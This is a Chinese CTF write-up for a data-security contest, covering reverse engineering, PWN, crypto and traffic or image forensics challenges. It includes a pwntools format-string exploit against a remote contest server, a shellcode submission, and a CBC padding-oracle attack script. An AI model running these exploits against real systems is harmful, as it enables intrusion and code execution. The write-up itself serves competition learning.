-联合战队|共同成长-
为深入学习贯彻党的二十大精神,发掘数据安全人才,促进数据安全技术发展与应用,提升我国数据安全治理能力,护航数字中国建设,中国电子信息产业发展研究院、中国信息通信研究院、国家工业信息安全发展研究中心、中国软件评测中心(工业和信息化部软件与集成电路促进中心)联合举办第二届数据安全大赛暨首届“数信杯”数据安全大赛。本赛事为数据安全产业高峰论坛的重要组成部分。
Reverse
re_ds001
打开附件之后有一个密文文件和加密器
加密器放到ida里面
可以看到加密器首先将一个未加密的文件加载成buffer,之后将buffer传进加密函数里面,加密逻辑如下
简单来说,首先进行了一次base64编码(base64只是编码,不提供保密性),之后进行了一次自定义逻辑加密
自定义逻辑是
每个字节左移和右移的结果合并后相当于循环移位,数据不会丢失,所以直接逆向即可。下面的脚本对每个字节循环左移5位(等价于循环右移3位)来还原
#include<stdio.h>
#include<windows.h>
int main()
{
char a2[] = { 0x6a,0x53,0x2a,0xd3,0x6a,0xa2,0x8a,0xd3,0x72,0x22,0xca,0x91,0x6a,0x53,0xca,0x3b,0x7a,0x22,0x4a,0x91,0x6a,0x53,0x3b,0x99,0x6a,0x53,0x0a,0xc3,0x6a,0x22,0x4a,0xd3,0x6a,0x53,0x1b,0xa9,0x72,0xd3,0x2a,0xa1,0x4a,0x22,0x32,0x53,0xd2,0xba,0x8a,0xbb,0x6a,0xaa,0x0a,0xc3,0xca,0xcb,0xa9,0x53,0x13,0x91,0x81,0x5a,0x6a,0x53,0x2a,0xc3,0x6a,0x53,0xaa,0x89,0x6a,0x53,0xaa,0xcb,0x6a,0x22,0x2a,0x3b,0x7a,0x22,0x1b,0x91,0x6a,0x22,0xaa,0x81,0x6a,0xa2,0x5b,0x91,0x72,0x22,0x4a,0xc3,0x6a,0xa2,0x1b,0xa1,0x6a,0x22,0x43,0xca,0x4a,0x3a,0xb2,0x53,0x6a,0x22,0x3b,0x99,0x72,0xa2,0x72,0x0a,0x72,0x3a,0x72,0x4b,0x6a,0x4b,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0xd3,0xca,0x91,0x6a,0xa2,0x4a,0xbb,0x72,0xd3,0xca,0x81,0x6a,0x53,0x1b,0x3b,0x72,0xd3,0x3b,0xa9,0x6a,0xa2,0x5b,0xcb,0x6a,0xa2,0x5b,0x91,0x72,0xa2,0x4a,0x91,0x6a,0x22,0xca,0xa9,0x6a,0x53,0x6a,0xa9,0x4a,0x3a,0x72,0x53,0xca,0x53,0x6a,0x91,0x7a,0x3a,0xaa,0xa1,0x8a,0x3a,0xca,0xa1,0x7a,0xa2,0x2a,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0x2a,0xcb,0x6a,0xa2,0x2a,0x91,0x6a,0xd3,0xca,0x99,0x6a,0x53,0xca,0x3b,0x7a,0x22,0x1b,0x89,0x72,0x53,0xaa,0x99,0x6a,0xa2,0x5b,0x99,0x72,0xa2,0x4a,0xa9,0x6a,0xa2,0x3b,0xa9,0x6a,0x53,0x5b,0x91,0x4a,0x22,0xca,0x81,0x7a,0x3a,0x8a,0xcb,0xd2,0x22,0x12,0x0a,0x6a,0x3a,0x8a,0x91,0xd2,0x4b,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0x89,0x6a,0xa2,0xaa,0xa1,0x72,0xd3,0xca,0x81,0x72,0xa2,0xaa,0x3b,0x7a,0xa2,0x1b,0x99,0x6a,0xa2,0xca,0xd3,0x6a,0x53,0x0a,0xc3,0x72,0xd3,0x4a,0xc3,0x6a,0x22,0x1b,0x91,0x7a,0xa2,0x4a,0xd3,0x4a,0x22,0x8a,0xa9,0xca,0xd3,0x92,0x43,0x72,0x5b,0x0a,0xa1,0x72,0xba,0xca,0xa1,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0x53,0xaa,0xa1,0x6a,0x53,0x0a,0xa1,0x72,0x53,0xaa,0xa1,0x6a,0x22,0x5b,0x3b,0x72,0xd3,0xaa,0xa1,0x7a,0xa2,0x3b,0x91,0x6a,0xa2,0x5b,0x89,0x7a,0xa2,0x4a,0x81,0x6a,0xa2,0x5b,0xa1,0x6a,0xa2,0x52,0xca,0x4a,0x22,0x8a,0x81,0xd2,0x53,0x5b,0xc3,0xca,0xba,0xb2,0x0a,0xca,0xba,0x4a,0xd3,0xd2,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0
xd3,0xca,0x99,0x6a,0x53,0x2a,0xc3,0x72,0x22,0xaa,0xa1,0x6a,0x22,0x1b,0x3b,0x7a,0xa2,0x8a,0xa9,0x6a,0xd3,0xca,0xa9,0x6a,0xa2,0x5b,0xa9,0x7a,0xa2,0x4a,0x91,0x6a,0x22,0xaa,0x99,0x7a,0xa2,0x1b,0x89,0x4a,0x22,0x43,0x43,0xca,0xa2,0x1b,0xa9,0x6a,0xa2,0xd2,0x0a,0xd2,0xa2,0xca,0xa9,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0x53,0x5b,0xc3,0x6a,0x53,0xca,0x81,0x7a,0x22,0x6a,0x3b,0x72,0xd3,0xca,0x91,0x72,0x53,0x5b,0x89,0x6a,0xa2,0x5b,0x89,0x72,0x53,0x4a,0x99,0x6a,0x22,0x1b,0x99,0x6a,0x53,0x4a,0x89,0x4a,0x22,0xaa,0xa9,0x72,0xa2,0x1b,0xcb,0x6a,0x2a,0x0a,0x91,0xd2,0xa2,0xca,0xbb,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0xa2,0x6a,0xd3,0x6a,0x53,0xaa,0xa9,0x6a,0x53,0x6a,0x3b,0x72,0xd3,0xca,0xa9,0x72,0x53,0xaa,0x89,0x6a,0xa2,0x5b,0x89,0x6a,0x53,0x4a,0x81,0x6a,0x53,0x1b,0xa1,0x6a,0xd3,0xca,0x91,0x4a,0x22,0x92,0x6b,0xca,0xba,0x72,0x43,0x72,0x5b,0x12,0x53,0xca,0x91,0x4a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0xca,0x99,0x6a,0xa2,0x1b,0xcb,0x7a,0xa2,0xaa,0xa1,0x6a,0x22,0x4a,0x3b,0x72,0xd3,0x2a,0xa9,0x6a,0xa2,0xaa,0x89,0x6a,0xa2,0x5b,0x91,0x72,0xd3,0x4a,0x89,0x6a,0x22,0x1b,0x91,0x6a,0x53,0x6a,0x81,0x4a,0x22,0x12,0x5b,0xca,0x53,0x3b,0x99,0x7a,0xa2,0x5b,0xc3,0x8a,0x3a,0x4a,0x99,0x72,0x1a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xaa,0x91,0x6a,0xa2,0xaa,0xcb,0x6a,0xd3,0xaa,0x89,0x6a,0x53,0x6a,0x3b,0x72,0xd3,0x0a,0xa9,0x72,0x22,0xaa,0xd3,0x6a,0xa2,0x5b,0x91,0x6a,0xd3,0x4a,0x81,0x6a,0xa2,0xca,0x99,0x72,0x53,0x5b,0xa1,0x4a,0x22,0x0a,0xa1,0x6a,0x6b,0x72,0x53,0x72,0xa2,0x43,0x0a,0x72,0x3a,0x8a,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0x89,0x6a,0x53,0x3b,0xa9,0x6a,0x53,0xaa,0xc3,0x72,0xa2,0x8a,0x3b,0x72,0xd3,0x6a,0x91,0x72,0x22,0xca,0xd3,0x6a,0xa2,0x5b,0xa9,0x72,0xa2,0x4a,0xa1,0x6a,0xa2,0x0a,0xa1,0x7a,0xa2,0x1b,0xc3,0x4a,0x3a,0x8a,0xbb,0x72,0xba,0x92,0x6b,0xca,0xaa,0x12,0x4b,0x72,0x6b,0x72,0x63,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0
x53,0x6a,0xd3,0x6a,0x53,0xaa,0xa9,0x7a,0xa2,0x2a,0x3b,0x7a,0x22,0x5b,0x99,0x72,0x22,0x3b,0xa9,0x6a,0xa2,0x5b,0x99,0x6a,0xd3,0x4a,0x99,0x6a,0xa2,0x5b,0x99,0x72,0xd3,0x4a,0xa1,0x4a,0x22,0xb2,0x6b,0xca,0xa2,0x0a,0xd3,0xca,0x81,0x12,0x5b,0xd2,0x6b,0x2a,0x81,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0x91,0x6a,0xa2,0x5b,0xbb,0x6a,0xa2,0xca,0x91,0x72,0xa2,0x3b,0x3b,0x7a,0x22,0xaa,0x91,0x7a,0x22,0x3b,0x89,0x6a,0xa2,0x5b,0x91,0x72,0x53,0x4a,0x81,0x6a,0x22,0x5b,0xa1,0x7a,0xa2,0x6a,0xbb,0x4a,0x22,0xd2,0x4b,0xca,0xd3,0x72,0x63,0xd2,0x5b,0x0a,0x91,0x72,0x1a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0xa2,0x1b,0x99,0x72,0xd3,0xca,0x91,0x72,0xd3,0x2a,0x3b,0x72,0xd3,0xaa,0x89,0x72,0x22,0x1b,0xc3,0x6a,0xa2,0x5b,0xa1,0x6a,0xa2,0x4a,0x91,0x6a,0x53,0xaa,0xa1,0x72,0x22,0x4a,0xcb,0x4a,0x22,0x5b,0x81,0x72,0x53,0x4a,0xbb,0xd2,0xba,0x72,0x0a,0xca,0x53,0x2a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0x53,0xca,0xa1,0x7a,0x22,0xca,0xd3,0x7a,0xa2,0xaa,0x3b,0x72,0xd3,0x5b,0x91,0x72,0x53,0x5b,0xcb,0x6a,0x53,0x0a,0xc3,0x72,0x22,0x6a,0xbb,0x6a,0x22,0x6a,0xa1,0x6a,0x22,0x2a,0x91,0x4a,0x22,0x43,0x6b,0x6a,0x22,0x23,0x5b,0x72,0x53,0x52,0x0a,0x7a,0x3a,0x2a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0x53,0x1b,0x91,0x7a,0x22,0xca,0x89,0x7a,0x22,0x5b,0x3b,0x72,0xd3,0x5b,0x89,0x72,0xd3,0x3b,0xc3,0x6a,0xa2,0x5b,0x91,0x72,0xd3,0x6a,0xbb,0x6a,0x53,0x0a,0x89,0x7a,0x22,0x8a,0xcb,0x4a,0x3a,0x52,0x6b,0x72,0x53,0xaa,0xc3,0x7a,0xaa,0x12,0x4b,0xd2,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0xa1,0x6a,0x53,0x4a,0x91,0x72,0xa2,0xaa,0xd3,0x6a,0x22,0xca,0x3b,0x7a,0xa2,0x4a,0xa9,0x6a,0x53,0x3b,0xa1,0x6a,0x53,0x0a,0xc3,0x6a,0xa2,0x4a,0xcb,0x6a,0xa2,0x4a,0x91,0x72,0xa2,0xca,0xa1,0x4a,0x22,0x0a,0xa9,0x6a,0x3a,0x4a,0xa9,0xca,0x53,0x43,0x0a,0x6a,0x6b,0x2a,0x89,0x6a,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0xd3,0x2a,0xd3,0x6a,0xa2,0x8a,0x99,0x72,0xd3,0xca,0xc3,0x72,0xd3,0x4a,0x3b,0x72,0
xd3,0xaa,0x99,0x6a,0xa2,0xaa,0x99,0x6a,0xa2,0x5b,0xa9,0x6a,0x22,0x4a,0xd3,0x6a,0x53,0x6a,0x89,0x72,0x53,0x2a,0xa1,0x4a,0x3a,0x92,0x43,0x6a,0x22,0x0a,0x81,0x7a,0x22,0x0a,0xa9,0x8a,0x22,0x5b,0xc3,0x62,0x6b,0x72,0xb3,0x13,0x8a,0x7b,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0xa2,0x5b,0x89,0x72,0x22,0xaa,0xc3,0x72,0xa2,0x4a,0x3b,0x7a,0xa2,0xca,0xa1,0x7a,0x22,0xaa,0xa9,0x6a,0xa2,0x5b,0x91,0x6a,0x22,0x4a,0x89,0x6a,0x22,0x1b,0x89,0x72,0xa2,0xaa,0x89,0x4a,0x22,0x23,0x43,0x6a,0x53,0xaa,0xc3,0x8a,0x22,0x0a,0xa9,0xd2,0xa2,0x6a,0xab,0xca,0x91,0xa1,0x5a };
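/* Undo the per-byte rotation applied by the encryptor.
 * The length is taken from sizeof: a2 is a brace-initialised array with no
 * terminating NUL, so strlen() would read past its end, and it would also
 * stop early at any 0x00 byte inside the data. */
size_t len = sizeof(a2);
size_t i;
for (i = 0; i < len; ++i)
{
    /* Use the unsigned value so the right shift never sign-extends. */
    unsigned char byte = (unsigned char)a2[i];
    /* Rotate left by 5 bits (same as rotate right by 3) within one byte. */
    a2[i] = (char)(unsigned char)((byte << 5) | (byte >> 3));
}
/* Emit exactly len bytes; "%s" would need a terminator the buffer lacks. */
fwrite(a2, 1, len, stdout);
return 0;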
}
对得到的base64编码进行解码即可
re_ds002
RC4+异或
调试获得密钥key,6A1D4E2a2276Y7JL
异或的密钥276Y7JB6A1D4E2A2
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define N 256
// RC4 S-box (N = 256 entries); filled by Init_Sbox and permuted further by Encrypt/Decrypt
unsigned char S[N];
//初始化S-box中的256个字节,key是加密密钥
// RC4 key scheduling: builds the global S-box permutation from key[0..key_len).
// key_len must be non-zero because the key index is taken modulo key_len.
void Init_Sbox(unsigned char* key, int key_len)
{
    int idx;
    int mix = 0;
    unsigned char held;

    // Start from the identity permutation S[k] = k.
    for (idx = 0; idx < N; idx++)
        S[idx] = idx;

    // Mix the key in: one swap per entry, cycling through the key bytes.
    idx = 0;
    while (idx < N)
    {
        mix = (mix + S[idx] + key[idx % key_len]) % 256;
        held = S[mix];
        S[mix] = S[idx];
        S[idx] = held;
        idx++;
    }
}
//RC4加密函数
// RC4 encryption: XORs Data[0..DataByte) in place with the keystream for Key.
// The S-box is rebuilt from Key on every call, so each call starts a fresh stream.
void Encrypt(unsigned char* Data, int DataByte, unsigned char* Key, int KeyLen)
{
    int x = 0;
    int y = 0;
    int pos = 0;
    unsigned char held;

    Init_Sbox(Key, KeyLen);
    while (pos < DataByte)
    {
        // Advance the two state indices, then swap the entries they select.
        x = (x + 1) % 256;
        y = (y + S[x]) % 256;
        held = S[y];
        S[y] = S[x];
        S[x] = held;
        // Keystream byte is the S-box entry indexed by the sum of the swapped pair.
        Data[pos] ^= S[(S[x] + S[y]) % 256];
        pos++;
    }
}
//RC4解密函数
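// RC4 decryption: XORs Data[0..DataByte) in place with the keystream for Key.
// Decryption is the same keystream XOR as encryption, so this delegates to
// Encrypt instead of keeping a second copy of the loop that could drift apart.
void Decrypt(unsigned char* Data, int DataByte, unsigned char* Key, int KeyLen)
{
    Encrypt(Data, DataByte, Key, KeyLen);
}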
//RC4加密/解密主函数
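// Decrypts the challenge file: XOR with xor_key, then RC4 with key, then
// prints the recovered text. Returns 1 if the input file cannot be opened.
int main()
{
    // Backslashes must be doubled inside a C string literal; written singly,
    // the "\r" in "\re_ds002" is a carriage return and the path is wrong.
    const char* filePath = "D:\\Download\\re_ds002\\en_file_data.enf2";
    // Up to 2047 bytes are read; one byte stays free for the terminating NUL.
    unsigned char data[2048];
    unsigned char data1[2048];
    unsigned char key[] = "6A1D4E2a2276Y7JL";
    unsigned char xor_key[] = "276Y7JB6A1D4E2A2";
    int keyLen = 16;
    int dataLen;
    int i;

    FILE* file = fopen(filePath, "rb"); // binary mode: the content is ciphertext
    if (file == NULL)
    {
        perror(filePath);
        return 1;
    }
    // The length comes from fread: ciphertext may contain 0x00 bytes and is not
    // NUL-terminated, so strlen() on it is unreliable.
    dataLen = (int)fread(data, sizeof(unsigned char), sizeof(data) - 1, file);
    fclose(file);

    // First layer: repeating-key XOR.
    for (i = 0; i < dataLen; i++)
    {
        data1[i] = data[i] ^ (xor_key[i % keyLen]);
    }
    // Second layer: RC4.
    Decrypt(data1, dataLen, key, keyLen);

    // Print the decrypted buffer (data1), not the raw file content (data).
    data1[dataLen] = '\0';
    printf("解密后 : %s\n", data1);
    return 0;
}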
解密得 : 35819955202 855981200427146647 821[email protected]
PWN
pb
就是简单的bss上的格式化字符串漏洞
exp
from pwn import *
import base64
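# Solver for the "pb" challenge. The write-up identifies the flaw as a
# format-string bug with the input buffer in .bss: user input reaches a
# printf-style call as the format argument. The service-side fix is a constant
# format string, e.g. printf("%s", buf).
# The string literals below have their "\n" / "\x00" escapes restored and the
# first format string rejoined; the extracted page had lost the backslashes
# and split that literal across three lines.
#p=process('./pb')
p=remote('106.15.53.199',32939)
context.clear(arch='amd64', os='linux', log_level='debug')
libc=ELF('./libc-2.23.so')
main=0x4011D6
# Candidate offsets into libc-2.23.so; only the first entry is used below.
one_addr=[0x45226,0x4527a,0xf03a4,0xf1247]

# Step 1: print two stack slots as pointers, separated by '-'.
p.sendafter(b'How to do?\n',b'%13$p-%11$p')
stack=int(p.recv(14),16)
# 0xe0 is a fixed distance from the leaked stack value to the slot that is
# overwritten later (presumably the saved return address - confirm in a debugger).
stack_ret=stack-0xe0
log.info(hex(stack_ret))
p.recvuntil(b'-')
# The second leak is treated as __libc_start_main+0xf0, which gives the libc base.
libc_base=int(p.recv(14),16)-0xf0-libc.sym['__libc_start_main']
log.info(hex(libc_base))
one=libc_base+one_addr[0]
log.info(hex(one))
# Split the target address into 16-bit pieces; one3 is computed but never written.
one1=one&0xffff
one2=(one>>16)&0xffff
one3=(one>>32)&0xffff

# Step 2: %hn / %hhn writes. Argument 13 is used to retarget the pointer that
# argument 39 is written through (presumably a stack pointer chain - confirm).
pay=b'%'+str(stack_ret&0xffff).encode()+b'c%13$hn'
p.sendlineafter(b'How to do?\n',pay)
pay=b'%'+str(one1).encode()+b'c%39$hn'
p.sendlineafter(b'How to do?\n',pay)
# Move the retargeted pointer two bytes further, then write the next 16 bits.
pay=b'%'+str((stack_ret&0xff)+2).encode()+b'c%13$hhn'
p.sendlineafter(b'How to do?\n',pay)
pay=b'%'+str(one2).encode()+b'c%39$hn'
p.sendlineafter(b'How to do?\n',pay)

# Final input: 0x20 NUL bytes.
pay=b'\x00'*0x20
p.sendlineafter(b'How to do?\n',pay)
p.interactive()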
aesc
Ida分析程序,存在一个call rax影响反汇编,直接patch掉,然后大概修复一下符号
之后对-后面的输入进行了处理,这里从插件可以看出来是aes
之后nop掉的call rax就是直接调用处理后的代码,而对于aes加密,key和iv分别为
找一段shellcode进行加密
尝试过之后发现不行,重新调试程序,发现解密数据不一致
分析加密过程可能有问题,调试发现key值会发生变化
重新解密
编写脚本getshell
from pwn import *
# pwntools target settings; log_level 'debug' prints all traffic.
context(arch = 'amd64', os = 'linux', log_level = 'debug')
# 'XXXX' / XXXX are the write-up's redacted host and port placeholders.
p = remote('XXXX',XXXX)
#p = process('./aesc')
#gdb.attach(p)
# Encrypted payload from the write-up (it describes AES-encrypting the input so
# that the service's own decryption yields the intended bytes).
# NOTE(review): the "\x" escape backslashes appear to have been lost when the
# page was extracted - as printed this is the literal text "x15xa0...", not
# 32 bytes. Compare with the original post before relying on it.
sc = 'x15xa0xcbxc8x52xbexf0x45x07x0cx44x89x89x81x16xe9x2ax0bx0exfax6bxeex2cxb8x4dxc5x5ax11xa8x18x61xb5'
# Per the write-up, the service processes the input that follows '-'.
payload = '-' + sc
p.sendline(payload)
p.interactive()
Crypto
Homooo0
crypto1部分是简单的LCG,这里直接使用Gröbner基求解线性关系,得到初始seed
crypto2部分是RSA并给出了hint。考虑到 hint = 114514^p mod q,由费马小定理知 114514^(p*q) ≡ 114514^p (mod q),即 hint ≡ 114514^n (mod q),所以 q 整除 hint - pow(114514, n, n),利用它与n求解gcd即可将n分解。解密得到的m是一个素因子列表,直接乘起来得到m2的值
综上将两部分flag拼接即可
from Crypto.Util.number import *
output = [379940911379953190738065211329880704968887929, 1872252095018294289102935465830666339134562151, 2218420719930619226319067546293478252242226458, 1579245444542904364875305481053943269743008549, 425392941117051285074706333070389609337530919, 657262378722139347423806179198617363063641535, 1461082838700350967433433211657342782936632658, 963751022151998652319872980044981590997051383, 1468468649834237142138916241795639564731929858, 894951290310162231498227170019052662901900106]
c = [5594765398895254497475390005515035165284947269482621212797364461116118828373030713653343829517676098247766810734167082486320857300603497577126713934378631060263065549510925849452528953404897544331443373022878004161177239661074098696364576450610303462705901680927031776827241380806829975994477307763410387909849663818842612816513488815063929788914749765715654361270374094951946698052421257227130710582004663667946833787782867142583952786583258460025201945224218183297310523389883123924792764297581896221795545651600004193837672786769087836697122181260018470054181076950975180483722573191259610507703805083959748628702, 18354543892431468698051144351651509749609506353214260811499577221908719283970286249536025926103536722940677113931335836508600695671820419801339342934435824515029299213790359041072360311512713705204002804129104738605964805164147722668894577827936326360814641394531203766344090798761628574626073504837365777460022073776704625251119419114486020315822475782336836237181108506820141633065828442597864716912066844670995455789274666742612665339577335803474044601225393448472601258235054542532455930028493965300794639477366773043061387713356068617705172707244145519119460068276515218619768447370748404523475940126401735202713, 13067613292114365350832630357309256892205092736734498409599614557765145853213115110662215358087327035294859139102830299174883445763972793544660067341892396813727940202103078616429693114912767222364824981525469897822258269033546395674755328159714895802743220805620518021794872638495366176488936655825440565962246474060922000652065256442083838487804427651100248697232018323068320537887588811670359374924969088709306632891312225283192959820408780025359635753658073155641892772680155573265995988033807925485674328357800451476663801518626815179947020769967024502712000390664616369855288447076430583396317901868635670903116, 
1970246464981582185079840308342735335756570281528051357081434733605120075805108626175190939428222607679594440560718696113780016317501300998689452986221340709539874390866027325399105690522914912573749101268828961339899528345351602783733709690435381749900678529472260068811603241699935312502099438047447306331357922551536595737577778748471614413662779347020098023845496542068130118804519461892845097834511960310899125700074564461627049111870520851339107312207939096802549130703012532791227081366939019573591861482505143545888091035625734830537575454122259156021272985568985231430666257475902788787851476741010590326796, 4790816369832644851013897396728451410603728845552047537461048213879599460860175754611778658469205466634464899690642512890640661282818232275974631154994300419771468298485497765937356667986209597926878867976087643208326859946748594585252359978987853991823440517117397399904923756242431741811540597482789716480873515811069162424083734824293917807033645119197175733111304137346440353394724292956442109722691111714269187897648996544169031722249416188817927438327053576322823860564997328322821310219755433667926629085898372372888612204240167051221066348207037067965641711907104335671740191330077770626646796483577466922248, 10814650073087646346270245700026520419052331614597670711170052995832396418767254831061783825732111951302617190609152386041063604227098960001222048116476448947363754273135043354765054048027259775479829994840608711993723541933400421406020697924870102262125774838260456598741580451631667066129474067717793740121714362269552616426983298596223194062472856768981086359085984098225437548540851003103040245764298690834662920035848986451312155517111160676356001420773607652602890064569225611459892163774585206246082361752026359493618236053535568190870389696937273946530288300181042259976780219925540591411434092069627883521589, 
17402258954583488899599077875782027692814099559940479055525715762308830292235828750274185447227093065906070741087056217439270030178529425666725470935320279585193413061911905402574473777027930507657670738102107008346656342925219094002445305706707695127526264448650657730801617264050097681327920107643154875069903297863683695217043121156225988854486200063498737759655924544668396741940750710151762056520992169228339196998725270006421679000430454557238994456964289263448493696220664760793673504610614794211760802780170221872766315614543591333048919946041272764838123984938843359468141442427857124108190855973548328439926]
hint = 16536285698408033188775970487002941871169646202054607075951261488252097050309959670888933647846979074234584091138294883295283655541922856105993430306089873050060823509469357653401611918358566181439207815795998432610088842959371420010593544007396878166928172572144613158071036940284924703911208736953641513236511987794121581605651025684223709898943350403042639624699485398601383308932061389249410713498575347849561123663911884193305584505859244156315903617357265674661399461569230410041997758445531606306507143956677733117597303102381050916764758656179521304902624285341437654760783955965761612971416984285177511972228
nn = 19146983551664702060097078821426397203936212633777978682169745838218120832974862357336060768023474701750459368454997765226576109516138124664705940970181884796090592025651687775377728753164334513191345754283706072450646288900663093945490502996638972998794132230852304097134994455627812996399122597839583024961826405525483276237662432278877829029168335844813894826246108076898652707988498096786814212257013685653982180235692189470315387649986765521900124337240432936201152716716736430994451736935879749385513107827824716135665305803700117296657477498198789850697139445575999541700057404516418222716008859942060344247147
# Part 1 (LCG): polynomial ring over ZZ in the unknown multiplier a,
# increment b and seed s.
R.<a, b, s> = ZZ[]
Fs = list()
for i in range(len(output)):
    # Advance the symbolic state (s <- a*s + b) and record the polynomial
    # "state - observed output" for this step.
    s = a*s + b
    Fs.append(s - output[i])
# Groebner basis of the ideal generated by those polynomials.
B = Ideal(Fs).groebner_basis()
# The last basis element is converted to an integer and used as the modulus.
# NOTE(review): relies on the basis ordering putting a constant last - confirm.
m = ZZ(B[-1])
# B[2] is read as a polynomial in one variable; minus its constant term, mod m,
# is taken as the seed. NOTE(review): index 2 depends on the basis layout - confirm.
s = ZZ(-B[2].univariate_polynomial()(0) % m)
m1 = long_to_bytes(s)
# Part 2 (RSA): hint - 114514^nn shares the factor q with nn, so one gcd factors nn.
q = GCD(nn, hint-ZZ(pow(114514, nn, nn)))
p = nn // q
# nn-p-q+1 equals (p-1)*(q-1); 65537 is used as the public exponent.
d = inverse_mod(65537, nn-p-q+1)
# Decrypt every ciphertext and multiply the results together to form m2.
m2 = prod([ZZ(pow(ci, d, nn)) for ci in c])
m2 = long_to_bytes(m2)
print(m1 + m2)
# b'flag{ad24537876ed7f4fccbc7d9f7ca7c473}'
AESsystem
AES的cbc padding oracle
from pwn import *
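# CBC padding-oracle solver for the "AESsystem" challenge. The oracle exists
# because the service answers differently ('failed' or not) depending on whether
# the padding of a submitted ciphertext is valid. Service-side fixes are
# authenticated encryption (e.g. AES-GCM) or verifying a MAC before decrypting,
# together with one uniform error response.
# The "\n" and "\x00" escapes below are restored; the extracted page had lost
# the backslashes, which left rjust() with a three-byte fill argument.
#io = process('./server.py')
io = remote('XXXX',XXXX)  # redacted host/port placeholders from the write-up
io.sendlineafter(b'Please enter your job name:\n', b'0'*15)
io.sendlineafter(b'** Give your choice: \n', b'1')
# Menu option 1 returns hex; the first 16 bytes are used as the IV.
enc_flag = bytes.fromhex(io.recvline().strip().decode())
iv, enc_flag = enc_flag[:16], enc_flag[16:]
flag = b''
for b in range(0, len(enc_flag), 16):
    block = enc_flag[b:b+16]
    # Recovered bytes of this block's intermediate (pre-XOR) value, right to left.
    suffix = b''
    for i in range(16):
        # Known bytes adjusted so they decrypt to the padding value i+1.
        now = xor(suffix, bytes([i+1])*len(suffix))
        for c in range(256):
            payload = (bytes([c]) + now).rjust(16, b'\x00') + block
            io.sendlineafter(b'** Give your choice: \n', b'3')
            io.sendlineafter(b'* Please input your message(hex):\n', payload.hex().encode())
            res = io.recvline()
            if b'failed' in res:
                continue
            suffix = bytes([c ^ (i + 1)]) + suffix
            break
        else:
            # No candidate byte was accepted for this position: give up.
            io.close()
            print(b, i)
            print("not this time")
            exit()
    # Plaintext = intermediate value XOR previous ciphertext block (or the IV).
    flag += xor(iv, suffix)
    iv = block
print(flag)
io.interactive()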
数据分析
数据分析1
明显为ftp流量(FTP以明文传输凭据),跟踪得到用户名和密码,md5后即为flag
ftp+admin+admin123
导出ftp-data对象得到,md5后即为flag
101+key
拼图脚本
from PIL import Image
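# Blank 400x400 RGB canvas that the strips are pasted onto.
result_image = Image.new('RGB', (400, 400))
# The tiles are named 1.png .. 100.png; each becomes one 400x4 horizontal strip.
for i in range(1, 101):
    image_path = f"./{i}.png"
    # The context manager closes each tile's file handle once it has been
    # resized, instead of leaving 100 files open until the script ends.
    with Image.open(image_path) as tile:
        strip = tile.resize((400, 4))
    # Strip i sits 4*(i-1) pixels below the top edge.
    y = (i - 1) * 4
    result_image.paste(strip, (0, y, 400, y + 4))
# Save the assembled picture.
result_image.save("./result_image.png")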
猫变换脚本
#coding=utf-8
import cv2
from PIL import Image
import numpy as np
# Parameters passed to arnold_decode for this challenge image.
shuffle_times = 1        # number of rounds
a, b = 0x6f6c53, 0x729e  # the two map coefficients used by the write-up
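def arnold_decode(image, shuffle_times, a, b):
    """Apply the inverse Arnold (cat map) coordinate transform to an image.

    Each round moves the value at ``image[x, y]`` to
    ``[((a*b + 1)*x - a*y) % N, (-b*x + y) % N]`` with ``N`` equal to the
    image height. The map is only a permutation of positions when the image
    is square, so height and width are expected to be equal.

    Args:
        image: array with at least two dimensions, indexed as image[x, y].
        shuffle_times: number of rounds to apply; round k works on the
            result of round k-1.
        a: first map coefficient.
        b: second map coefficient.

    Returns:
        A new float64 array with the same shape as ``image`` (all zeros when
        ``shuffle_times`` is 0). The input array is not modified.
    """
    h, w = image.shape[0], image.shape[1]
    N = h  # modulus; assumes a square image (h == w)
    ab_plus_one = a * b + 1  # loop-invariant coefficient
    current = image
    decode_image = np.zeros(shape=image.shape)
    for _ in range(shuffle_times):
        # Fresh output per round, read from the previous round's result:
        # reading from the untouched input every time would make any number
        # of rounds give the same answer as a single round.
        decode_image = np.zeros(shape=image.shape)
        for ori_x in range(h):
            for ori_y in range(w):
                new_x = (ab_plus_one * ori_x + (-a) * ori_y) % N
                new_y = ((-b) * ori_x + ori_y) % N
                decode_image[new_x, new_y] = current[ori_x, ori_y]
        current = decode_image
    return decode_image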
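# cv2.imread returns None instead of raising when the file is missing or
# unreadable, so check before handing the result to arnold_decode.
img = cv2.imread('flag1.png')
if img is None:
    raise FileNotFoundError("flag1.png could not be read")
flag = arnold_decode(img, shuffle_times, a, b)
cv2.imwrite('./res1.png',flag)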
得到二维码后,zsteg得到base64,解码即为flag
